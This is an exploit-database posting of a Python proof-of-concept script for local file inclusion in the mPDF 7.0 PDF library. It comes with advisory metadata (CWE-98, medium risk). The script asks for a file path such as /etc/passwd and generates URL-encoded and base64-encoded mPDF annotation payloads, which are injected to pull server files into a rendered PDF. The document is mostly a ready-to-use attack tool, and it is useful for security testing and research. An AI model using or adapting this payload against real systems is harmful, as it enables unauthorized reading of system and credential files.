mPDF 7.0 Local File Inclusion

2022.08.02
Credit: Musyoka Ian
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-98

# Exploit Title: mPDF 7.0 - Local File Inclusion # Google Dork: N/A # Date: 2022-07-23 # Exploit Author: Musyoka Ian # Vendor Homepage: https://mpdf.github.io/ # Software Link: https://mpdf.github.io/ # Version: CuteNews # Tested on: Ubuntu 20.04, mPDF 7.0.x # CVE: N/A #!/usr/bin/env python3 from urllib.parse import quote from cmd import Cmd from base64 import b64encode class Terminal(Cmd): prompt = "\nFile >> " def default(self, args): payload_gen(args) def banner(): banner = """ _____ _____ ______ ______ ___ __ __ _ _ _ | __ \| __ \| ____| |____ / _ \ \ \ / / | | (_) | _ __ ___ | |__) | | | | |__ / / | | | \ V / _____ ___ __ | | ___ _| |_ | '_ ` _ \| ___/| | | | __| / /| | | | > < / _ \ \/ / '_ \| |/ _ \| | __| | | | | | | | | |__| | | / / | |_| | / . \ | __/> <| |_) | | (_) | | |_ |_| |_| |_|_| |_____/|_| /_/ (_)___(_)_/ \_\ \___/_/\_\ .__/|_|\___/|_|\__| | | |_| """ print(banner) def payload_gen(fname): payload = f'<annotation file="{fname}" content="{fname}" icon="Graph" title="Attached File: {fname}" pos-x="195" />' encoded_payload = quote(payload) print("[+] Replace the content with the payload below") print(f"Url encoded payload:\n{encoded_payload}\n") base64enc = b64encode(encoded_payload.encode()) print(f"Base64 encoded payload:\n{base64enc.decode()}\n") if __name__ == ("__main__"): banner() print("Enter Filename eg. /etc/passwd") terminal= Terminal() terminal.cmdloop()


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top